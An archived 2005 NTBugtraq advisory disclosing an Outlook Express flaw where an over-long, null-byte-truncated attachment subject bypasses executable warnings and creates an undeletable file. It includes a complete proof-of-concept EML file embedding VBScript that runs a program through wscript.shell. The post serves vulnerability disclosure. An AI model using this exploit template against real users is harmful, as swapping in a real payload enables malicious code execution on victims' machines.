Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security NTBugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Microsoft Windows - Filesystem bug allows various things

from [Benjamin Tobias Franz] Network Security [Permanent Link]
Subject: Microsoft Windows - Filesystem bug allows various things
Date: Fri, 3 Jun 2005 16:30:21 +0200 
Microsoft Windows - Filesystem bug allows various things


Description:
A bug in Microsoft Windows can be exploited to create files, which can not
be accessed by ("normal") programs and Windows itself. You can not access
(open, rename, delete, ...) such files. The file properties can not be read
or changed, too. To create such files an attacker must send an special
formed email to a victim and the victim must open an attachment (e.g. a
text-file - but im sure, there is a way to create such files from remote
without opening attachments).

The weakness can be exploited by malicious people to trick users into
opening a malicious attachment, too:
Microsoft Outlook Express will open any executable attachment without
showing the correct warning message (for software) and the real type of the
file, if an email is special formed and the OE option to block attachments,
which can contain viruses is disabled (many users have disabled this). OE
will only show its normal (warning) message.


Proof-of-Concept exploit (save as EML file):
===>>> PoC - Start <<<===
From:"Benjamin Tobias Franz"<0-1-2-3@gmx.de>
To:You
Subject:MSOE - Attachment Download Security Restriction Bypass
Date:Wed, 1 Jun 2005
Content-Type:multipart/mixed;boundary="btf"

--btf
Content-Type: text/plain;

Open the attachment and you will see:
1. MS OE will not show the correct warning message (for software)
2. MS OE will not show any file type
3. MS OE will create a non-accessible file


Regards,

Benjamin Tobias Franz
Germany
--btf
Content-Type:message/rfc822
Content-Transfer-Encoding:quoted-printable

<!--
Subject:BTF's MSOE Attachment Download Security Restriction Bypass=
.hta=00.btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
btfbtf
-->
<title>YOU ARE VULNERABLE</title>
<script language=3Dvbscript>set btf=3Dcreateobject("wscript.shell")
btf.run("calc")</script><body style=3D"background-color:red;font-si=
ze:40px;"><b>YOU ARE VULNERABLE (If you do not see this =
message in an email-message window)!!!</b><br><br><br>Regards,
<br><br>Benjamin Tobias Franz<br>Germany</body>
--btf--

===>>> PoC - End <<<===


Technical details :
When Microsoft Outlook Express finds an attachment with content-type
"message/rfc822" and no file name is specified, it will use the subject of
the attached message for file name. To exploit this the subject must contain
more than 255 chars and end with: file extension + binary 0 + dot +
anything. So the file will not be opened as EML file; but the included file
extension (before binary 0) will be used to detect the program to open (but
not to detect the file type).
The created file will be saved in a subdirectory of directory "Content.IE5"
(You can open it by running "C:\Documents and Settings\*Your Username*\Local
Settings\Temporary Internet Files\Content.IE5\"). You can find the file by
searching in this directory (and its subdirectories) for files which include
"BTF's MSOE Attachment Download Security Restriction Bypass" in their name.
You will find a file displayed as hidden system file and you can not access
or delete it.

Affected software:
Microsoft Windows

Workaround:
-

Date of discovery:
01. June 2005

Tested software:
Fully patched system running Windows XP SP2.
Microsoft Outlook Express 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

DLL versions:
MSOE.DLL: 6.00.2900.2527 (xpsp_sp2_gdr.040919-1056)
MSOERES.DLL: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)



Regards,

Benjamin Tobias Franz
Germany

--
NTBugtraq Editor's Note:

Most viruses these days use spoofed email addresses. As such, using an 
Anti-Virus product which automatically notifies the perceived sender of a 
message it believes is infected may well cause more harm than good. Someone who 
did not actually send you a virus may receive the notification and scramble 
their support staff to find an infection which never existed in the first 
place. Suggest such notifications be disabled by whomever is responsible for 
your AV, or at least that the idea is considered.
--

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Microsoft Windows - Filesystem bug allows various things, Benjamin Tobias Franz <=
Previous by Date:  reconsidering physical security: pod slurping, Abe Usher
Next by Date:  [NGSEC] AntiPharming v1.00 FREE, NGSEC
Previous by Thread:  reconsidering physical security: pod slurping, Abe Usher
Next by Thread:  [NGSEC] AntiPharming v1.00 FREE, NGSEC
Indexes:  [Date] [Thread] [Top] [All Lists]